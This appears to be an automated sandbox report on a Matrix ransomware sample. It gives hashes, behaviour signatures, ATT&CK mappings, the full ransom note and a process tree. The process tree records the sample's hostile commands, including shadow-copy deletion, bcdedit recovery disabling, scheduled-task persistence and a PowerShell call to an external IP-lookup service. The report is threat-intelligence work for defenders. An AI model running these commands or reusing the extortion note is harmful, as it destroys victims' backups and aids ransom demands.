Overview

overview

10

Static

static

3

FoxRansomw...65.exe

windows7-x64

10

FoxRansomw...65.exe

windows10-2004-x64

10

FoxRansomw...a7.exe

windows7-x64

10

FoxRansomw...a7.exe

windows10-2004-x64

10

FoxRansomw...20.exe

windows7-x64

10

FoxRansomw...20.exe

windows10-2004-x64

10

FoxRansomw...0b.exe

windows7-x64

10

FoxRansomw...0b.exe

windows10-2004-x64

10

FoxRansomw...53.exe

windows7-x64

10

FoxRansomw...53.exe

windows10-2004-x64

10

FoxRansomw...b1.exe

windows7-x64

10

FoxRansomw...b1.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    13-02-2024 05:15

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe

  • Size

    1.2MB

  • MD5

    607d292bdcdde297252e002e613282ae

  • SHA1

    0161d2dd582d064f7e7f50ccb43478ff0884916a

  • SHA256

    0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65

  • SHA512

    2bdc2ff857f9f52aac5071d3a695f7baf822a971969ba263ad03769c41af7916b558bada6bfe76fe78f730235a4ca5d2dd1cf3eaa2a59c5efef06af0a798acb8

  • SSDEEP

    24576:J/SA+2lraRrjSJR5ezmT1dM9bB5slYQt2e8F/KpXcd:PXlOslYQt+5

Score
10/10
matrixdiscoveryevasionpersistenceransomwarespywarestealerupx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://myexternalip.com/raw

Extracted

Path

C:\Program Files\Google\Chrome\Application\#ANN_README#.rtf

Ransom Note
{\rtf1\ansi\ansicpg1251\deff0\nouicompat\deflang1049{\fonttbl{\f0\fnil\fcharset0 Calibri;}{\f1\fnil\fcharset204 Calibri;}} {\colortbl ;\red255\green0\blue0;\red0\green77\blue187;\red0\green176\blue80;\red0\green0\blue255;\red255\green255\blue255;} {\*\generator Riched20 10.0.15063}\viewkind4\uc1 \pard\ri-500\sa200\sl240\slmult1\qc\tx8804\ul\b\f0\fs28\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\ulnone\f1\lang1049\par \pard\ri-74\sl240\slmult1\tx8378\cf1\f0\fs24\lang1033 ATENTION!!!\par \cf0\b0 We are realy sorry to inform you that \b ALL YOUR FILES WERE ENCRYPTED \par \b0 by our automatic software. It became possible because of bad server security. \par \cf1\b ATENTION!!!\par \cf0\b0 Please don't worry, we can help you to \b RESTORE\b0 your server to original\par state and decrypt all your files quickly and safely!\par \b\par \cf2 INFORMATION!!!\par \cf0\b0 Files are not broken!!!\par Files were encrypted with AES-128+RSA-2048 crypto algorithms.\par There is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \b DELETED AFTER 7 DAYS! \b0 You will irrevocably lose all your data!\par \i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\par * Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\f1\lang1049\par \i0\f0\lang1033\par \cf3\b HOW TO RECOVER FILES???\par \cf0\b0 Please write us to the e-mail \i (write on English or use professional translator)\i0 :\par \pard\sl240\slmult1\b\fs28 [email protected]\par [email protected]\par [email protected]\cf1\fs24\par You have to send your message on each of our 3 emails\f1\lang1049 \f0\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\fs28\par \pard\ri-74\sl240\slmult1\tx8378\cf0\b0\fs24 \par In subject line write your personal ID:\par \b\fs28 5A6DB33418B4B4BD\par \b0\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \f1\lang1049\par \i * \f0\lang1033 \f1\lang1049 \f0\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \par \i0\par \cf1\b OUR ADVICE!!!\par \cf0\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\par \ul\b\par We will definitely reach an agreement ;) !!!\b0\par \ulnone\par \fs20 \par \par \par \par \par \par \par \pard\ri-74\sl240\slmult1\qc\tx8378\b\fs24 ALTERNATIVE COMMUNICATION\par \b0\fs20\par \pard\ri-74\sl240\slmult1\tx8378 \f1\lang1049 If y\'eeu did n\'eet r\'e5c\'e5iv\'e5 th\'e5 \'e0nsw\'e5r fr\'eem th\'e5 \'e0f\'eer\'e5cit\'e5d \'e5m\'e0il\f0\lang1033 s\f1\lang1049 f\'eer m\'eer\'e5 th\f0\lang1033 e\f1\lang1049 n \f0\lang1033 24\f1\lang1049 h\f0\lang1033 o\f1\lang1049 urs\f0\lang1033 please s\f1\lang1049\'e5\f0\lang1033 nd us Bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 s fr\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r thr\f1\lang1049\'ee\f0\lang1033 ugh th\f1\lang1049\'e5\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 bp\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 {{\field{\*\fldinst{HYPERLINK https://bitmsg.me }}{\fldrslt{https://bitmsg.me\ul0\cf0}}}}\f0\fs20 . B\f1\lang1049\'e5\f0\lang1033 l\f1\lang1049\'ee\f0\lang1033 w is \f1\lang1049\'e0\f0\lang1033 tut\f1\lang1049\'ee\f0\lang1033 ri\f1\lang1049\'e0\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 n h\f1\lang1049\'ee\f0\lang1033 w t\f1\lang1049\'ee\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nd bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 vi\f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r:\par 1. \f1\lang1049\'ce\f0\lang1033 p\f1\lang1049\'e5\f0\lang1033 n in y\f1\lang1049\'ee\f0\lang1033 ur br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r th\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\fldrslt{https://bitmsg.me/users/sign_up\ul0\cf0}}}}\f0\fs20 \f1\lang1049\'e0\f0\lang1033 nd m\f1\lang1049\'e0\f0\lang1033 k\f1\lang1049\'e5\f0\lang1033 th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n b\f1\lang1049\'f3\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 ring n\f1\lang1049\'e0\f0\lang1033 m\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd.\par 2. \f1\lang1049\'d3\'ee\f0\lang1033 u must c\f1\lang1049\'ee\f0\lang1033 nfirm th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n, r\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd f\f1\lang1049\'ee\f0\lang1033 ll\f1\lang1049\'ee\f0\lang1033 w th\f1\lang1049\'e5\f0\lang1033 instructi\f1\lang1049\'ee\f0\lang1033 ns th\f1\lang1049\'e0\f0\lang1033 t w\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nt t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 u.\par 3. R\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 sit\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e0\f0\lang1033 nd \f1\lang1049\'f1\f0\lang1033 lick \f1\lang1049 "\f0\lang1033 L\f1\lang1049\'ee\f0\lang1033 gin\f1\lang1049 "\f0\lang1033 l\f1\lang1049\'e0\f0\lang1033 b\f1\lang1049\'e5\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 r us\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\fldrslt{https://bitmsg.me/users/sign_in\ul0\cf0}}}}\f0\fs20 , \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd \f1\lang1049\'e0\f0\lang1033 nd click th\f1\lang1049\'e5\f0\lang1033 "Sign in" butt\f1\lang1049\'ee\f0\lang1033 n. \f1\lang1049 \f0\lang1033\par 4. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "\f1\lang1049\'d1\f0\lang1033 r\f1\lang1049\'e5\'e0\f0\lang1033 t\f1\lang1049\'e5\f0\lang1033 R\f1\lang1049\'e0\f0\lang1033 nd\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss" butt\f1\lang1049\'ee\f0\lang1033 n.\par 5. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "N\f1\lang1049\'e5\f0\lang1033 w m\f1\lang1049\'e0\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\par \b 6. S\f1\lang1049\'e5\f0\lang1033 nding m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 :\par T\f1\lang1049\'ee\f0\lang1033 :\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss: \b BM-2cUPmiEDYswzWC3ZmbtybDJeUNHqSpERL1\par \pard\sl240\slmult1 Subj\f1\lang1049\'e5\'f1\f0\lang1033 t:\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur ID: \b 5A6DB33418B4B4BD\par M\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 : \b0 D\f1\lang1049\'e5\f0\lang1033 scrib\f1\lang1049\'e5\f0\lang1033 wh\f1\lang1049\'e0\f0\lang1033 t \f1\lang1049\'f3\'ee\f0\lang1033 u think n\f1\lang1049\'e5\f0\lang1033 c\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 r\f1\lang1049\'f3\f0\lang1033 .\par \pard\ri-74\sa200\sl240\slmult1\tx8378\f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "S\f1\lang1049\'e5\f0\lang1033 nd m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\cf5\b\par \pard\sa200\sl240\slmult1\fs28 jJ9RzddM\cf0\f1\fs32\lang1049\par \par }
Emails
URLs

https://bitmsg.me

https://bitmsg.me/users/sign_up

https://bitmsg.me/users/sign_in

Signatures

  • Matrix Ransomware 64 IoCs

    Targeted ransomware with information collection and encryption functionality.

    ransomwarematrix
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
    ransomwareevasion
  • Blocklisted process makes network request 1 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 4 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops desktop.ini file(s) 40 IoCs
  • Enumerates connected drives 3 TTPs 44 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWSrMQJj.exe
    "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWSrMQJj.exe" -n
    1⤵
    • Executes dropped EXE
    PID:2668
  • C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWSrMQJj.exe"
    1⤵
      PID:2368
    • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
      "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe"
      1⤵
      • Matrix Ransomware
      • Loads dropped DLL
      • Drops desktop.ini file(s)
      • Enumerates connected drives
      • Drops file in Program Files directory
      • Suspicious use of WriteProcessMemory
      PID:2120
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vdam32qB.txt"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2848
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2892
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\deuNEF1q.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2268
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\deuNEF1q.bmp" /f
          3⤵
          • Sets desktop wallpaper using registry
          PID:1588
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
          3⤵
            PID:1160
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
            3⤵
              PID:1880
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\xwyMIp7x.vbs"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2468
            • C:\Windows\SysWOW64\wscript.exe
              wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\xwyMIp7x.vbs"
              3⤵
                PID:2768
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\HbkYF590.bat" /sc minute /mo 5 /RL HIGHEST /F
                  4⤵
                    PID:2880
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\HbkYF590.bat" /sc minute /mo 5 /RL HIGHEST /F
                      5⤵
                      • Creates scheduled task(s)
                      PID:1132
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
                    4⤵
                      PID:2324
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /Run /I /tn DSHCA
                        5⤵
                          PID:760
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\4TIUmeBd.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:796
                    • C:\Windows\SysWOW64\attrib.exe
                      attrib -R -A -S "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"
                      3⤵
                      • Views/modifies file attributes
                      PID:2736
                    • C:\Windows\SysWOW64\cacls.exe
                      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C
                      3⤵
                        PID:3028
                      • C:\Windows\SysWOW64\takeown.exe
                        takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"
                        3⤵
                        • Modifies file permissions
                        PID:1484
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c dOTEiSx9.exe -accepteula "DefaultID.pdf" -nobanner
                        3⤵
                        • Loads dropped DLL
                        • Suspicious use of WriteProcessMemory
                        PID:1912
                        • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\dOTEiSx9.exe
                          dOTEiSx9.exe -accepteula "DefaultID.pdf" -nobanner
                          4⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:2604
                          • C:\Users\Admin\AppData\Local\Temp\dOTEiSx964.exe
                            dOTEiSx9.exe -accepteula "DefaultID.pdf" -nobanner
                            5⤵
                            • Drops file in Drivers directory
                            • Sets service image path in registry
                            • Executes dropped EXE
                            • Enumerates connected drives
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious behavior: LoadsDriver
                            • Suspicious use of AdjustPrivilegeToken
                            PID:340
                  • C:\Windows\system32\conhost.exe
                    \??\C:\Windows\system32\conhost.exe "4271383521583077221-1187407218-50388744316234968398165325838953693401401790295"
                    1⤵
                      PID:3028
                    • C:\Windows\system32\taskeng.exe
                      taskeng.exe {FB947233-C91B-42E6-BA15-C3FF2A2AAC6D} S-1-5-21-452311807-3713411997-1028535425-1000:OZEMQECW\Admin:Interactive:[1]
                      1⤵
                        PID:2896
                        • C:\Windows\SYSTEM32\cmd.exe
                          C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\HbkYF590.bat"
                          2⤵
                            PID:2712
                            • C:\Windows\system32\vssadmin.exe
                              vssadmin Delete Shadows /All /Quiet
                              3⤵
                              • Interacts with shadow copies
                              PID:1772
                            • C:\Windows\System32\Wbem\WMIC.exe
                              wmic SHADOWCOPY DELETE
                              3⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1656
                            • C:\Windows\system32\bcdedit.exe
                              bcdedit /set {default} recoveryenabled No
                              3⤵
                              • Modifies boot configuration data using bcdedit
                              PID:1616
                            • C:\Windows\system32\bcdedit.exe
                              bcdedit /set {default} bootstatuspolicy ignoreallfailures
                              3⤵
                              • Modifies boot configuration data using bcdedit
                              PID:436
                            • C:\Windows\system32\schtasks.exe
                              SCHTASKS /Delete /TN DSHCA /F
                              3⤵
                                PID:1212
                          • C:\Windows\system32\vssvc.exe
                            C:\Windows\system32\vssvc.exe
                            1⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3972

                          Network

                          MITRE ATT&CK Enterprise v15

                          Reconnaissance

                          Resource Development

                          Initial Access

                          Execution

                          Scheduled Task/Job

                          1
                          T1053

                          Persistence

                          Boot or Logon Autostart Execution

                          1
                          T1547

                          Registry Run Keys / Startup Folder

                          1
                          T1547.001

                          Scheduled Task/Job

                          1
                          T1053

                          Privilege Escalation

                          Boot or Logon Autostart Execution

                          1
                          T1547

                          Registry Run Keys / Startup Folder

                          1
                          T1547.001

                          Scheduled Task/Job

                          1
                          T1053

                          Defense Evasion

                          File and Directory Permissions Modification

                          1
                          T1222

                          Hide Artifacts

                          1
                          T1564

                          Hidden Files and Directories

                          1
                          T1564.001

                          Indicator Removal

                          2
                          T1070

                          File Deletion

                          2
                          T1070.004

                          Modify Registry

                          2
                          T1112

                          Credential Access

                          Unsecured Credentials

                          1
                          T1552

                          Credentials In Files

                          1
                          T1552.001

                          Discovery

                          Peripheral Device Discovery

                          1
                          T1120

                          Query Registry

                          2
                          T1012

                          System Information Discovery

                          2
                          T1082

                          Lateral Movement

                          Collection

                          Data from Local System

                          1
                          T1005

                          Command and Control

                          Exfiltration

                          Impact

                          Defacement

                          1
                          T1491

                          Inhibit System Recovery

                          3
                          T1490

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Program Files\Google\Chrome\Application\#ANN_README#.rtf
                            Filesize

                            8KB

                            MD5

                            ca6cc353a0a38fbd75ef7754437b0ebd

                            SHA1

                            87ce1b6bda1a044f04fae9e0773207883f9562f5

                            SHA256

                            9c827eae6072fbce97af46f0b42ac5c4076c21bdc915fb727bd047947dd0a0b8

                            SHA512

                            7b681b40eae96356ac97ce115deb5cc49c250c580e0251522d22fcf697616577cceb35931b9888d754f8c5d4720b7e21b3a5d927a274a2c2afdc659faeead90d

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\4TIUmeBd.bat
                            Filesize

                            246B

                            MD5

                            ac19f820b572be9c936b293c37fb2b50

                            SHA1

                            0606d70b4e9deb0c2f28e66e5472fef5f71d1396

                            SHA256

                            18ca7126c00e488748aa6f95b9b2369fd8d4912e907cdcb68a0afb8a3d3ced2a

                            SHA512

                            210edbe95f70525b038a12d7c85f3837b452955799b67b118e73ab93bff44438bd456f0cb5be2474a8228233f0c67338d41768a83b9e905021e44e4f11629d83

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\elog_5A6DB33418B4B4BD.txt
                            Filesize

                            31KB

                            MD5

                            eb910a3a9a54500dc5f66cd897bb1574

                            SHA1

                            9eaa970c732dedb0f9be4697b0480b4a04cb17be

                            SHA256

                            8a195dee433d8b7149a6bbb3c10ef1ba136dcbdfdc49e11cfaffd61547a59fad

                            SHA512

                            c5747c94fa851d28ba813835329a5d0ceea7f25afb79176438b323b87bd3983f45596799e0647ee2df51210c6d20c445ac02172836f0e4f4e32061e77fdac77f

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vdam32qB.txt
                            Filesize

                            14B

                            MD5

                            c74dacdd9331a6698efffe81ff66ac08

                            SHA1

                            79e8ce4bb5cc2436e95fad4a74a31aee7aa63043

                            SHA256

                            82ad297f8577dd8f868d0068e253c3d6b61a1e332d7038ed18d23da65b03ad6c

                            SHA512

                            24620715fb4e07f73db38962b2f95b77396d09a65f153c138f4d873e7f83f9cc72a16423ce2af745f8a04d1e657dfa7d9136ec3fd9ff5794b385ec33edae89da

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Temp\dOTEiSx964.exe
                            Filesize

                            221KB

                            MD5

                            3026bc2448763d5a9862d864b97288ff

                            SHA1

                            7d93a18713ece2e7b93e453739ffd7ad0c646e9e

                            SHA256

                            7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

                            SHA512

                            d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

                            Download Submit

                          • C:\Users\Admin\AppData\Roaming\HbkYF590.bat
                            Filesize

                            265B

                            MD5

                            ac43b2ebc34f9f3778d0002e4fac71c4

                            SHA1

                            3c5954ec19dd0aaa77199aa57fbc122573af9c4c

                            SHA256

                            9bba67f8a4275952df677e02d11ec45011a34d869390ffa2d3400de3c2a41710

                            SHA512

                            c0d1a35234d67f625329297eed5e7eb9ed45bd4adc3ecd6dbff34b0a208d8d872b4ad0c76ef4f5299017ac54ffbbdef91fb5ce3f92b603bf253407a167803f39

                            Download Submit

                          • C:\Users\Admin\AppData\Roaming\xwyMIp7x.vbs
                            Filesize

                            260B

                            MD5

                            afc291a3771fa24c4ff20a0fa986120e

                            SHA1

                            b8fafbb0f289e16f9079a88cb271653aa69b7487

                            SHA256

                            3f207977ea639c0ce41d6bdd009dc3be7be055c5d2fbe1fc34a0e7fce18c71fc

                            SHA512

                            71d9cb3c26b04a08e0696186e3f047d5b3f6bcc363bc202877b4e4f095f8f2e9b475e74fd5aefa93695db791ccac570c3da1b13bba0538f6d7fe94b68c93ec20

                            Download Submit

                          • \Users\Admin\AppData\Local\Temp\FoxRansomware\NWSrMQJj.exe
                            Filesize

                            1.2MB

                            MD5

                            607d292bdcdde297252e002e613282ae

                            SHA1

                            0161d2dd582d064f7e7f50ccb43478ff0884916a

                            SHA256

                            0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65

                            SHA512

                            2bdc2ff857f9f52aac5071d3a695f7baf822a971969ba263ad03769c41af7916b558bada6bfe76fe78f730235a4ca5d2dd1cf3eaa2a59c5efef06af0a798acb8

                            Download Submit

                          • \Users\Admin\AppData\Local\Temp\FoxRansomware\dOTEiSx9.exe
                            Filesize

                            181KB

                            MD5

                            2f5b509929165fc13ceab9393c3b911d

                            SHA1

                            b016316132a6a277c5d8a4d7f3d6e2c769984052

                            SHA256

                            0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

                            SHA512

                            c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

                            Download Submit

                          • memory/1912-7948-0x0000000000220000-0x0000000000297000-memory.dmp

                            Filesize

                            476KB

                            Download

                          • memory/1912-1345-0x0000000000220000-0x0000000000297000-memory.dmp

                            Filesize

                            476KB

                            Download

                          • memory/2120-15-0x0000000000400000-0x000000000053F000-memory.dmp

                            Filesize

                            1.2MB

                            Download

                          • memory/2120-7933-0x0000000000400000-0x000000000053F000-memory.dmp

                            Filesize

                            1.2MB

                            Download

                          • memory/2120-7945-0x0000000000400000-0x000000000053F000-memory.dmp

                            Filesize

                            1.2MB

                            Download

                          • memory/2120-9358-0x0000000000400000-0x000000000053F000-memory.dmp

                            Filesize

                            1.2MB

                            Download

                          • memory/2120-9421-0x0000000000400000-0x000000000053F000-memory.dmp

                            Filesize

                            1.2MB

                            Download

                          • memory/2604-1407-0x0000000000400000-0x0000000000477000-memory.dmp

                            Filesize

                            476KB

                            Download

                          • memory/2604-7937-0x0000000000400000-0x0000000000477000-memory.dmp

                            Filesize

                            476KB

                            Download

                          • memory/2668-8-0x0000000000400000-0x000000000053F000-memory.dmp

                            Filesize

                            1.2MB

                            Download

                          • memory/2892-16-0x00000000741E0000-0x000000007478B000-memory.dmp

                            Filesize

                            5.7MB

                            Download

                          • memory/2892-14-0x0000000001C10000-0x0000000001C50000-memory.dmp

                            Filesize

                            256KB

                            Download

                          • memory/2892-13-0x0000000001C10000-0x0000000001C50000-memory.dmp

                            Filesize

                            256KB

                            Download

                          • memory/2892-12-0x00000000741E0000-0x000000007478B000-memory.dmp

                            Filesize

                            5.7MB

                            Download

                          • memory/2892-11-0x00000000741E0000-0x000000007478B000-memory.dmp

                            Filesize

                            5.7MB

